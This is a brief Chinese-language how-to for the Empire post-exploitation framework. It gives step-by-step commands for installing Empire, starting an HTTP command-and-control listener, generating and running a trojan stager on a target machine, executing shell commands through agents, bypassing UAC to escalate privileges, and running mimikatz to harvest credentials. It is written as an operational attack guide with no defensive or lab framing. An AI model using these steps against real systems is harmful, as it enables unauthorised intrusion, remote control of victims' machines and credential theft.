Emprie使用说明
安装Empire
- 第一种方法
git clone https://github.com/EmpireProject/Empire.git
cd /Empire/setup/
./install.sh
./reset.sh
- 第二种方法
wget 网址
unzip Empire.zip
docker pull empireproject/empire
./reset.sh
注:网络状态不好导致部分组建下载失败,就多次执行安装命令
使用
- 运行empire:
./empire
- 设置监听
- 进入监听模块,输入:
listeners
- 列出可以监听类:
uselistener
空格加按两下tab键 - 使用http,即输入:
uselistener http
- 查看监听类信息:
info
- 设置name参数:
set Name 监听器名
- 设置其他参数(
set Host 172.16.8.25:33678
【设置ip和port】),如ip、port,可不设置(默认本机地址&一个端口) - 执行:
execute
- 查看已有监听器:listener模块下输入
list
- 进入监听模块,输入:
- 生成木马
- 进入监听器模式:
back
- 进入木马生成模块:
usestager
- 选择木马类型:
usestager 木马类型名
(按两下tab获取所有的木马类型) - 查看木马信息:
info
- 设置监听器:
set Listener 监听器名
- 执行:
execute
- 进入监听器模式:
- 运行木马
- 在目标机上运行木马
- 到listener模式下监听:
back
- 查看agents:
agents
- 使用agents:
interact agents名字
- 查看可运行命令:
help
- 目标系统上执行命令:
shell 系统密码
- 提权
- 选取提权模块:
usemodule privesc/bypassuac
- 设置监听器:
set Listener 监听器名
- 执行:
execute
,如提示都按y
- 回到agents模式下:
back
两次 - 列出agents:
list
,发现有新的高权限agent - 使用高权限agents:
interact agents名字(名字带*号)
- 执行mimikatz:
mimikatz
- 选取提权模块: